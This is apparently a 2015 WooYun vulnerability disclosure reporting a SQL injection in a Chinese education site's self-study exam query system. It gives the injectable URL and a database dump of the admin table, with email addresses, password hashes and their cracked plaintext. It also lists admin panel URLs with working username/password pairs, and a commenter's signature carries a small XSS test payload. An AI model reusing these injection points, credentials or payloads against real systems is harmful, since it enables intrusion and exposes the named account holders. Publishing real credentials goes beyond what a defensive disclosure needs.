当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-096074

漏洞标题:中国教育在线自考信息查询系统sql注射

相关厂商:www.eol.cn

漏洞作者: DloveJ

提交时间:2015-02-10 12:33

修复时间:2015-02-15 12:34

公开时间:2015-02-15 12:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-10: 细节已通知厂商并且等待厂商处理中
2015-02-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

进后台其实不算啥危害,但是这毕竟是官网,如果发些恶意信息,危害就大了。

详细说明:

注射点

http://search.zikao.eol.cn/admin/exam_page.php?exam_id=36


Database: zikaosearchnew
[6 tables]
+---------------+
| zikao_admin |
| zikao_exam |
| zikao_plan |
| zikao_school |
| zikao_special |
| zikao_spinfo |
+---------------+
Database: zikaosearchnew
Table: zikao_admin
[4 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| admin_id | int(11) |
| email | varchar(50) |
| passwd | varchar(50) |
| username | varchar(50) |
+----------+--------------------+----------------------------------+----------+
| admin_id | email | passwd | username |
+----------+--------------------+----------------------------------+----------+
| 6 | zhangxj@cernet.com | e10adc3949ba59abbe56e057f20f883e | zhangxj |123456
| 3 | admin@cernet.com | 2a7171502602894660143bde6d6abfcf | root |cernet

最后解密是弱口令,哎,知道的话就先找后台了。。~——~


360截图20150206175205055.jpg

360截图20150206175436293.jpg

360截图20150206175720085.jpg

360截图20150206180953896.jpg

360截图20150206182252825.jpg


后台

http://search.zikao.eol.cn/admin1/
root/cernet
zhangxj/123456
http://search.zikao.eol.cn/admin/admincp/


俩个都是后台。。

漏洞证明:

360截图20150206182252825.jpg

修复方案:

不知道

版权声明:转载请注明来源 DloveJ@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-02-15 12:34

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2015-02-10 12:49 | 0x 80 ( 普通白帽子 | Rank:1301 漏洞数:398 | 某安全公司招聘系统运维、渗透测试、安全运...)

    小伙子

  2. 2015-02-10 13:00 | DloveJ ( 普通白帽子 | Rank:1107 漏洞数:200 | <a href=javascrip:alert('xss')>s</a> 点...)

    @0x 80 怎么了??

  3. 2015-02-10 13:13 | 0x 80 ( 普通白帽子 | Rank:1301 漏洞数:398 | 某安全公司招聘系统运维、渗透测试、安全运...)

    @DloveJ 你娃儿,呵呵

  4. 2015-02-10 13:47 | DloveJ ( 普通白帽子 | Rank:1107 漏洞数:200 | <a href=javascrip:alert('xss')>s</a> 点...)

    @0x 80 不懂。。。